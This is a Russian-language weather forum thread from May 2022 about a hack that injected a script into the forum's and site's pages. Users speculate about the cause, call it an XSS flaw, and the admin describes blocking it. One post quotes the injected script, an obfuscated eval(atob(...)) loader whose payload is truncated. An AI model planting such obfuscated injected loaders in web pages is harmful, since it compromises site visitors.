Добро пожаловать на Метеофорум!

Paxan96 · 21 мая 2022, 19:30:26

Хакер что взломал сайт и ранее взламывал метеоклуб один и тот же, или это разные

Mesocyclon · 21 мая 2022, 20:35:48

Видать кому-то стало нечего делать

А вот и сам вредоносный код:

<script>eval(decodeURIComponent(atob("JTBBJTJGJTJGJTIwJTNEJTNEVXNlclNjcmlwdCUzRCUzRCUwQSUyRiUyRiUyMCU0MG5hbWUlMjAlMj.....</script>

qwerty · 21 мая 2022, 20:48:03

Еле-еле сюда зашёл.

Похоже, что вставили скрипт на главную страницу форума.

Paxan96 · 21 мая 2022, 21:45:20

Цитата: Winter_storm от 21 мая 2022, 20:48:03
Еле-еле сюда зашёл.

Похоже, что вставили скрипт на главную страницу форума.

Сайта тоже.

Alter · 21 мая 2022, 22:06:13

Надо ждать, пока костян вычистит этот чудо-скрипт с сайта, а пока только отключение жс помогает.

Paxan96 · 21 мая 2022, 22:39:03

Цитата: Alter от 21 мая 2022, 22:06:13
Надо ждать, пока костян вычистит этот чудо-скрипт с сайта, а пока только отключение жс помогает.

А как он мог прописаться?

Vasilii · 21 мая 2022, 22:52:15

Цитата: Paxan96 от 21 мая 2022, 22:39:03
А как он мог прописаться?

Вон создатель лурка закрыл свой сайт, может и Костян решил сделать определённый жест, хотя бы на несколько часиков

Alter · 21 мая 2022, 22:56:16

Цитата: Paxan96 от 21 мая 2022, 22:39:03
Цитата: Alter от 21 мая 2022, 22:06:13
Надо ждать, пока костян вычистит этот чудо-скрипт с сайта, а пока только отключение жс помогает.
А как он мог прописаться?

Лень писать много, есть статья, где в простых словах описано, что это такое.
https://www.google.com/amp/s/habr.com/ru/amp/post/511318/

Spasatel · 21 мая 2022, 23:14:27

Я в старом Internet Explorer захожу и никакой сирены

Вообще все нормально, никакой скрипт на него не действует.

Kostian · 22 мая 2022, 02:16:40

Проблему временно локализовал, отключив строчки кода, в которых происходило внедрение скрипта. Утром буду дальше разбираться.

Paxan96 · 22 мая 2022, 13:03:47

Теперь в некоторых темах эта хрень началась.

Alter · 22 мая 2022, 13:32:13

Код вставляется все время после такого элемента
<a id="c1">
Сразу в следующий за ним элемент внедряется.

Kostian · 22 мая 2022, 13:51:28

Так, ну на данный момент вывод этого скрипта на страницах я заблокировал. Пока что он мешать не будет. Осталось только найти, где и как он был внедрен.

Alter · 22 мая 2022, 13:57:11

Это общая xss уязвимость, этот символ позволяет обойти экранирование. Похоже, надо менять id категорий на какой-нибудь "cat1", чтобы избежать данной проблемы.

Kostian · 22 мая 2022, 14:05:22

Alter

Код не только на форуме, но и на страницах сайта был внедрен в title. Так что тут не все так просто.

Добро пожаловать на Метеофорум!

Spasatel